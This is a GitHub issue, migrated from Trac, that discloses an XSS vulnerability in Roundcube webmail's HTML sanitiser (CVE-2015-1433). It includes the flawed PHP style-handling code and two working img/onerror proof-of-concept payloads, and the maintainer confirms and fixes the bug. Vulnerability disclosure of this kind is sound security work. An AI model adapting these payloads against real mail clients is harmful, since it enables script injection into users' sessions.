Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

XSS Vulnerability on the Body of the Email #4739

Closed
rcubetrac opened this Issue Jan 12, 2015 · 9 comments

Comments

Projects
None yet
1 participant

Reported by phithon on 12 Jan 2015 17:03 UTC as Trac ticket #1490227

Hi, guys
I've found that someone send you an email include HTML code:

<img src="data:xxx1" style=aaa:'"/onerror=alert(1)//' >

The javascript code "alert(1)" will be executed .
The vulnerability occured in "/program/lib/Roundcube/rcube_washtml.php"

else if ($key == 'style' && ($style = $this->wash_style($value))) {

                $quot = strpos($style, '"') !== false ? "'" : '"';

                $t .= ' style=' . $quot . $style . $quot;

            }

When single quote and double quote both in $style the style attribute will be closed, and all the content after quote will get out.
<img src="data:xxx1" style=aaa:'"/onerror=alert(1)' > becomes <img src="data:xxx1" style='aaa: '"/onerror=alert(1)'' />
btw. execute only in chrome.
[[Image(http://www.leavesongs.com/content/plugins/kl_album/upload/201501/a6469005d34f6cf677510da16ab733ee201501130059391461631074.jpg)]]

Keywords: XSS
Migrated-From: http://trac.roundcube.net/ticket/1490227

Comment by phithon on 12 Jan 2015 17:35 UTC

you can contact me.
root@leavesongs.com

Comment by @alecpl on 12 Jan 2015 17:57 UTC

I'm unable to reproduce, could you attach sample message?

Milestone changed by @alecpl on 12 Jan 2015 17:57 UTC

later => 1.1.0

Comment by @alecpl on 12 Jan 2015 19:55 UTC

Ah sorry, I didn't notice it is for Chrome only. Confirmed.

Comment by phithon on 13 Jan 2015 02:27 UTC

Replying to alec:

Ah sorry, I didn't notice it is for Chrome only. Confirmed.

This poc could works in most of browers except firefox:

<img src="data:xxx1" style=aaa:'title="/"onerror=alert(1)//' >

Comment by @alecpl on 13 Jan 2015 08:42 UTC

Fixed in 786aa07.

Status changed by @alecpl on 13 Jan 2015 08:42 UTC

new => closed

@rcubetrac rcubetrac closed this Jan 13, 2015

Comment by agustin on 25 Jan 2015 18:22 UTC

Does this problem affect the version 0.9.5? Or is it only for versions 1.0 and later?

Comment by henrisalo on 29 Mar 2015 20:21 UTC

Please use CVE-2015-1433 for this issue, thanks.

@rcubetrac rcubetrac added this to the 1.1.0 milestone Mar 20, 2016

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment